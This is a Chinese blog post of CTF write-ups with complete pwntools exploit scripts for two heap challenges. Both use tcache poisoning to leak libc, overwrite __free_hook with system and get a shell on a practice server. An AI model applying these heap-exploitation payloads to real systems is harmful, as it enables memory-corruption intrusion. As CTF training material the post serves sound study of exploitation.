noxctf2018_grocery_list&&actf_2019_message

原創 doudoudedi 2020-06-28 23:41

noxctf2018_grocery_list

先是觀察函數發現有一個可以泄露棧地址然後通過tcache attack打到棧上泄露libcbase然後再次寫入free_hook拿到shell
exp:

#!/usr/bin/python2
from pwn import *
#p=process('./GroceryList')
p=remote('node3.buuoj.cn',26988)
elf=ELF('./GroceryList')
libc=elf.libc

sda=lambda data,data1:p.sendlineafter('%s'%(data),data1)
rec=lambda data:p.recvuntil(data)

def show():
	sda('Exit','1')

def add(sele,name):
	sda('Exit','2')
	sda('?',str(sele))
	sda(':',name)

def empadd(sele,man):
	sda('Exit','3')
	sda('?',str(sele))
	sda('?',str(man))

def delete(idx):
	sda('Exit','4')
	sda('?',str(idx))

def edit(idx,name):
	sda('Exit','5')
	sda('?',str(idx))
	sda(':',name)

def Tadd():
	sda('Exit','6')

add(2,'\x11'*4)#0
add(2,'\x12'*4)#1
Tadd()#2
add(2,'\x09'*9)#3
#Tadd()
show()
stack_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-11
log.success('stack_addr: '+hex(stack_addr))
delete(3)
payload=p64(0)*3+p64(0x41)+p64(stack_addr)
edit(2,payload)
add(2,'doudou')
empadd(2,1)
#Tadd()
#delete(2)
#show()
show()
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-231-libc.sym['__libc_start_main']
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add(3,'doudou')
delete(5)
payload=p64(0)*7+p64(0x71)+p64(free_hook)
edit(3,payload)
add(3,'/bin/sh\x00')
add(3,p64(system))
delete(5)
p.interactive()

actf_2019_message

沒開PIE直接亂打一通~~
exp:

from pwn import *
#p=process('./ACTF_2019_message')
p=remote('node3.buuoj.cn',26585)
elf=ELF('./ACTF_2019_message')
libc=elf.libc
sd=lambda data:p.send(data)
sda=lambda data,data2:p.sendlineafter('%s'%(data),data2)
def add(size,content):
	sda(': ','1')
	sda(':',str(size))
	#sda(':',content)
	p.sendafter(':',content)

def delete(idx):
	sda(': ','2')
	sda(':',str(idx))

def edit(idx,content):
	sda(': ','3')
	sda(':',str(idx))
	#sda(':',content)
	p.sendafter(':',content)

def show(idx):
	sda(': ','4')
	sda(':',str(idx))

def exp():
	add(0x68,'\x09'*9)#0
	add(0x450,'\x08'*8)#1
	add(0x68,'/bin/sh\x00')#2
	add(0x58,'\x07'*7)#3
	delete(0)
	delete(0)
	delete(1)
	add(0x68,p64(0x000602060))
	add(0x68,'doudou')
	add(0x68,p64(0)*2+p64(0x460))
	show(1)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
	log.success('libcbase: '+hex(libcbase))
	system=libcbase+libc.sym['system']
	free_hook=libcbase+libc.sym['__free_hook']
	delete(3)
	delete(3)
	add(0x58,p64(free_hook))
	add(0x58,'doudou')
	add(0x58,p64(system))
	delete(2)
	#show(2)
	p.interactive()

if __name__=="__main__":
	exp()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

[題]爆棧

1

大猫会长 2020-07-07 05:31:12

[題]對Null和undefined使用展開運算符

1 2  

大猫会长 2020-07-07 05:31:12

Scrambled Polygon(凸包+極角排序)

題目鏈接:Scrambled Polygon 先給出知識點的講解鏈接:傳送門 極角就是高中學的,極座標系中的極角。 sort對結構體排序,不都有一個cmp的函數嗎?就是這個函數。 我們都會按照一個參數來改,這回我們就按照極角來

反向爆零直至AK 2020-07-07 03:58:56

Need for Speed(二分)

題目鏈接:Need for Speed Sheila is a student and she drives a typical student car: it is old, slow, rusty, and falling a

反向爆零直至AK 2020-07-07 03:58:56

迷宮2(牛客網,最短路)

這一題主要就是思路加最短路。 首先你要知道這是一道求最短路的題目。 因爲起點或者終點是沒有辦法被圍起來的,所以只能從下邊或者左邊的一個點出發,到達上邊或者右邊的一個點(這個過程只能走上下左右四個方向,因爲蜥蜴可以走八個方向),過

反向爆零直至AK 2020-07-07 03:58:56

牛客網 Big Boss(完全揹包)

題目鏈接:Big Boss 鏈接:https://www.nowcoder.com/acm/contest/102/L 來源:牛客網 時間限制:C/C++ 1秒,其他語言2秒 空間限制:C/C++ 131072K,其他語言26

反向爆零直至AK 2020-07-07 03:58:56

4 Values whose Sum is 0(二分)

題目鏈接:4 Values whose Sum is 0 啊啊啊,這一題真是虧了,應該二分交一發的,只怪那回lower_bound和upper_bound寫出陰影了,導致這回都不敢交了(要好好學習一下了)。 題目大意:給你n組數,

反向爆零直至AK 2020-07-07 03:58:56

送分啦-QAQ(斐波那契博弈)

這一題就是一個斐波那契博弈問題。 斐波那契博弈: 有一堆個數爲n(n>=2)的石子,遊戲雙方輪流取石子,規則如下: 1)先手不能在第一次把所有的石子取完,至少取1顆; 2)之後每次可以取的石子數至少爲1,至多爲對手剛取的石子數的

反向爆零直至AK 2020-07-07 03:58:56

問題 G: 矩陣(二維樹狀數組)

題目鏈接:問題 G: 矩陣 輸入 輸出 樣例輸入 1 3 4 4 Q 1 1 1 1 Q 1 1 3 2 M 1 1 3 Q 1 1 3 4 樣例輸出 2 21 55 提示 思路: 二維樹

反向爆零直至AK 2020-07-07 03:58:56

hihocoder #1148 : 2月29日(容斥原理,有坑)

題目鏈接:#1148 : 2月29日 時間限制:2000ms 單點時限:1000ms 內存限制:256MB 描述 給定兩個日期,計算這兩個日期之間有多少個2月29日(包括起始日期)。 只有閏年有2月29日,滿足以下一個條件

反向爆零直至AK 2020-07-07 03:58:56

2020年Unity面試題總結

之前面試的時候看了網上的unity面試題,考的時候一個都沒考到,考的巨難,工資還低。這幾天又開始面試,結果發現考的又是網上流傳的unity面試題了,但是我又沒記,考的大部分都看過相關的知識,沒有牢記,考的時候就說的模糊不清。。面了兩三家才

云上空 2020-07-06 18:43:59

打印沙漏-python

本題要求你寫個程序把給定的符號打印成沙漏的形狀。例如給定17個“*”,要求按下列格式打印 ***** *** * *** ***** 所謂“沙漏形狀”,是指每行輸出奇數個符號;各行符號中心對齊;相鄰兩行符號數差2;符號數先從大

Alamoooooooo 2020-07-05 14:35:45

Have Fun with Numbers-python

自測-4 Have Fun with Numbers (20分) Notice that the number 123456789 is a 9-digit number consisting exactly the numbers fr

Alamoooooooo 2020-07-05 14:35:45

數組元素循環右移問題-python

一個數組A中存有N(>0)個整數,在不允許使用另外數組的前提下,將每個整數循環向右移M(≥0)個位置,即將A中的數據由(A​0​​A​1​​⋯A​N−1​​)變換爲(A​N−M​​⋯A​N−1​​A​0​​A​1​​⋯A​N−M−1​​)

Alamoooooooo 2020-07-05 14:35:45

【題目記錄】鏈表環的問題

1.判斷鏈表是否有環: bool hasCycle(ListNode *head) { if(head==nullptr) return false; ListNode *

o小菜 2020-07-05 04:23:37